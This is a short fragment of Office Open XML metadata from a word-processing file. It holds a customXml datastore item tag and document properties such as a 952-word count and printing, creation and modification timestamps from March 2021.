<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D8B06A90-D3BB-46F5-9B4E-4E6E1815BD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1</Pages>
  <Words>952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cp:lastPrinted>2021-03-25T22:08:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-25T12:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-25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